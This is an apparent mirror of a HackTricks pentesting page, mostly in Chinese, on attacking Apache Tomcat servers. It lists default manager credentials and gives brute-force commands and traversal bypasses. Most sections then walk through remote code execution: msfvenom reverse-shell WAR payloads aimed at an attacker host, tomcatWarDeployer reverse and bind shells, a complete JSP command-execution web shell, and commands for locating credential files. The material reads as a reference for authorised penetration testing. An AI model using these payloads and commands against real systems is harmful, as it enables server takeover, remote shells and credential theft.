Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 15:12:11 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/tomcat.md

16 KiB
Raw Blame History

Tomcat

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

发现最重要的漏洞以便更快地修复它们。Intruder跟踪您的攻击面运行主动威胁扫描发现整个技术堆栈中的问题从API到Web应用程序和云系统。立即免费试用

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

发现

  • 它通常运行在端口8080
  • 常见的Tomcat错误

枚举

版本

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"

定位管理文件

有趣的是找到页面 /manager/host-manager 的位置,因为它们可能有不同的名称。你可以使用暴力破解来搜索它们。

用户名枚举

在某些早于Tomcat6的版本中你可以枚举用户

msf> use auxiliary/scanner/http/tomcat_enum

默认凭据

Tomcat中最有趣的路径是_/manager/html_在这个路径下你可以上传和部署war文件执行代码。但是这个路径受基本的HTTP身份验证保护最常见的凭据有

  • admin:admin
  • tomcat:tomcat
  • admin:<NOTHING>
  • admin:s3cr3t
  • tomcat:s3cr3t
  • admin:tomcat

你可以使用以下方式测试这些凭据和更多凭据:

msf> use auxiliary/scanner/http/tomcat_mgr_login

另一个有趣的Tomcat路径是/manager/status您可以在此处查看操作系统和Tomcat的版本。当您无法访问/manager/html这对于查找影响Tomcat版本的漏洞非常有用。

暴力破解

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST tomacat-site.internal
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts <IP>

漏洞

密码回溯泄露

尝试访问/auth.jsp,如果你非常幸运,它可能会在回溯中泄露密码

双重URL编码

一个众所周知的漏洞是使用CVE-2007-1860中的mod_jk来访问应用程序管理器它允许双重URL编码路径遍历

为了访问Tomcat的管理Web请转到pathTomcat/%252E%252E/manager/html

请注意为了上传Webshell您可能需要使用双重URL编码技巧并发送一个cookie和/或SSRF令牌。
为了访问后门您可能还需要使用双重URL编码技巧。

/examples

以下示例脚本随Apache Tomcat v4.x - v7.x一起提供并可供攻击者获取有关系统的信息。这些脚本也已知容易受到跨站脚本攻击XSS注入的攻击来自这里)。

  • /examples/jsp/num/numguess.jsp
  • /examples/jsp/dates/date.jsp
  • /examples/jsp/snp/snoop.jsp
  • /examples/jsp/error/error.html
  • /examples/jsp/sessions/carts.html
  • /examples/jsp/checkbox/check.html
  • /examples/jsp/colors/colors.html
  • /examples/jsp/cal/login.html
  • /examples/jsp/include/include.jsp
  • /examples/jsp/forward/forward.jsp
  • /examples/jsp/plugin/plugin.jsp
  • /examples/jsp/jsptoserv/jsptoservlet.jsp
  • /examples/jsp/simpletag/foo.jsp
  • /examples/jsp/mail/sendmail.jsp
  • /examples/servlet/HelloWorldExample
  • /examples/servlet/RequestInfoExample
  • /examples/servlet/RequestHeaderExample
  • /examples/servlet/RequestParamExample
  • /examples/servlet/CookieExample
  • /examples/servlet/JndiServlet
  • /examples/servlet/SessionExample
  • /tomcat-docs/appdev/sample/web/hello.jsp

路径遍历(..;/

在一些Tomcat的易受攻击配置中,您可以使用路径/..;/访问Tomcat中的受保护目录。

因此,例如,您可以通过访问www.vulnerable.com/lalala/..;/manager/html访问Tomcat管理器页面。

使用此技巧绕过受保护路径的另一种方法是访问http://www.vulnerable.com/;param=value/manager/html

RCE

最后如果您可以访问Tomcat Web应用程序管理器您可以上传和部署.war文件执行代码

限制

只有当您拥有足够的权限(角色:adminmanagermanager-script您才能部署WAR。这些详细信息通常在/usr/share/tomcat9/etc/tomcat-users.xml中定义(版本可能有所不同)(参见POST部分)。

# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

Metasploit是一款广泛使用的渗透测试工具用于评估和验证系统的安全性。它提供了一系列功能强大的模块用于发现、利用和管理安全漏洞。Metasploit可以用于测试Web应用程序、操作系统、网络设备等各种目标。

Metasploit的核心是它的模块化架构。它包含了大量的模块包括扫描器、漏洞利用工具、负载生成器等。这些模块可以根据需要进行组合和配置以实现特定的渗透测试目标。

Metasploit还提供了一个强大的命令行界面使用户可以通过命令行进行各种操作。此外Metasploit还提供了一个图形用户界面GUI使用户可以通过可视化界面进行操作。

Metasploit的使用需要一定的技术知识和经验因为它涉及到复杂的渗透测试技术和工具。然而一旦掌握了Metasploit的基本原理和操作方法它将成为渗透测试工作中的重要利器。

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

MSFVenom反向Shell

The MSFVenom tool is a powerful payload generator and encoder that is part of the Metasploit Framework. It allows you to create custom payloads for various exploits, including reverse shells.

To generate a reverse shell payload using MSFVenom, you can use the following command:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f war > shell.war

Replace <attacker IP> with your IP address and <attacker port> with the port you want to listen on. This command will generate a Java Server Pages (JSP) payload that establishes a reverse TCP connection to your machine.

The -f war option specifies the output format as a Web Application Archive (WAR) file, which can be deployed on a Tomcat server.

Once you have generated the payload, you can deploy it on a vulnerable Tomcat server. After successful deployment, start a listener on your machine using a tool like Netcat or Metasploit. When the target server executes the payload, it will establish a reverse shell connection back to your machine.

Remember to use this technique responsibly and only on systems that you have proper authorization to test.

msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war

然后,上传revshell.war文件并访问它(/revshell/

使用tomcatWarDeployer.py进行绑定和反向shell

在某些情况下这种方法不起作用例如旧版本的sun

下载

git clone https://github.com/mgeeky/tomcatWarDeployer.git

反向 shell

A reverse shell is a type of shell in which the target machine initiates the connection to the attacker's machine. This allows the attacker to gain remote access to the target machine and execute commands. Reverse shells are commonly used in post-exploitation scenarios to maintain persistent access to a compromised system.

To establish a reverse shell, the attacker typically needs to exploit a vulnerability in a network service running on the target machine. Once the vulnerability is exploited, the attacker can inject malicious code that establishes a connection back to their machine.

There are various tools and techniques available for creating reverse shells, including using netcat, Python, or Metasploit. The choice of tool depends on the specific requirements of the penetration test and the target environment.

It is important to note that the use of reverse shells for unauthorized access to systems is illegal and unethical. Reverse shells should only be used in authorized penetration testing engagements or for educational purposes with proper consent and legal authorization.

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

绑定 shell

A bind shell is a type of shell that allows an attacker to gain remote access to a compromised system. It works by binding a shell to a specific port on the target system, allowing the attacker to connect to that port and gain control over the system.

To create a bind shell, the attacker needs to find a vulnerable service running on the target system that allows remote connections. One common target is the Apache Tomcat web server, which is often used to host Java-based web applications.

Once the attacker has identified a vulnerable service, they can exploit it to execute arbitrary commands on the target system. This can be done by injecting malicious code into the service, such as a web application or a configuration file.

Once the malicious code is executed, it opens a network socket on a specific port and waits for a connection from the attacker. When the attacker connects to the port, the bind shell is established, and the attacker gains remote access to the system.

Bind shells can be used for various purposes, such as stealing sensitive information, launching further attacks, or maintaining persistent access to the compromised system.

To protect against bind shell attacks, it is important to keep all software and services up to date with the latest security patches. Additionally, network monitoring and intrusion detection systems can help detect and prevent unauthorized access attempts.

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

使用Culsterd

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

手动方法 - Web shell

创建名为 index.jsp 的文件,并使用以下内容

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>

mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it

您还可以安装这个(允许上传、下载和执行命令):http://vonloesch.de/filebrowser.html

手动方法2

获取一个JSP Web Shell比如这个并创建一个WAR文件

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp

POST

Tomcat凭据文件的名称是 tomcat-users.xml

find / -name tomcat-users.xml 2>/dev/null

获取Tomcat凭据的其他方法

msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

其他Tomcat扫描工具

找到最重要的漏洞以便您能更快地修复它们。Intruder跟踪您的攻击面运行主动威胁扫描发现整个技术栈中的问题从API到Web应用和云系统。立即免费试用

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥